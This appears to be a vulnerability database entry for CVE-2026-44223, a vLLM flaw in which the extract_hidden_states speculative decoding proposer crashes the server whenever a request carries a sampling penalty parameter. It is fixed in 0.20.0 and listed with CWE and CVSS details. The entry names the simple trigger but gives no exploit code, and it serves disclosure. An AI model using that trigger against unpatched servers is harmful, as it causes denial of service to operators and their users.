vLLM is an inference and serving engine for large language models (LLMs). From to before 0.20.0, the extract_hidden_states speculative decoding proposer in vLLM returns a tensor with an incorrect shape after the first decode step, causing a RuntimeError that crashes the EngineCore process. The crash is triggered when any request in the batch uses sampling penalty parameters (repetition_penalty, frequency_penalty, or presence_penalty). A single request with a penalty parameter (e.g., "repetition_penalty": 1.1) is sufficient to crash the server. This vulnerability is fixed in 0.20.0.
History

Tue, 12 May 2026 23:30:00 +0000

Type Values Removed Values Added
First Time appeared Vllm-project
Vllm-project vllm
Vendors & Products Vllm-project
Vllm-project vllm

Tue, 12 May 2026 20:15:00 +0000

Type Values Removed Values Added
Description vLLM is an inference and serving engine for large language models (LLMs). From to before 0.20.0, the extract_hidden_states speculative decoding proposer in vLLM returns a tensor with an incorrect shape after the first decode step, causing a RuntimeError that crashes the EngineCore process. The crash is triggered when any request in the batch uses sampling penalty parameters (repetition_penalty, frequency_penalty, or presence_penalty). A single request with a penalty parameter (e.g., "repetition_penalty": 1.1) is sufficient to crash the server. This vulnerability is fixed in 0.20.0.
Title vLLM: extract_hidden_states speculative decoding crashes server on any request with penalty parameters
Weaknesses CWE-131
CWE-704
References
Metrics cvssV3_1

{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}


cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published: 2026-05-12T19:58:40.862Z

Updated: 2026-05-12T19:58:40.862Z

Reserved: 2026-05-05T15:42:40.518Z

Link: CVE-2026-44223

cve-icon Vulnrichment

No data.

cve-icon NVD

Status : Received

Published: 2026-05-12T20:16:43.293

Modified: 2026-05-12T20:16:43.293

Link: CVE-2026-44223

cve-icon Redhat

No data.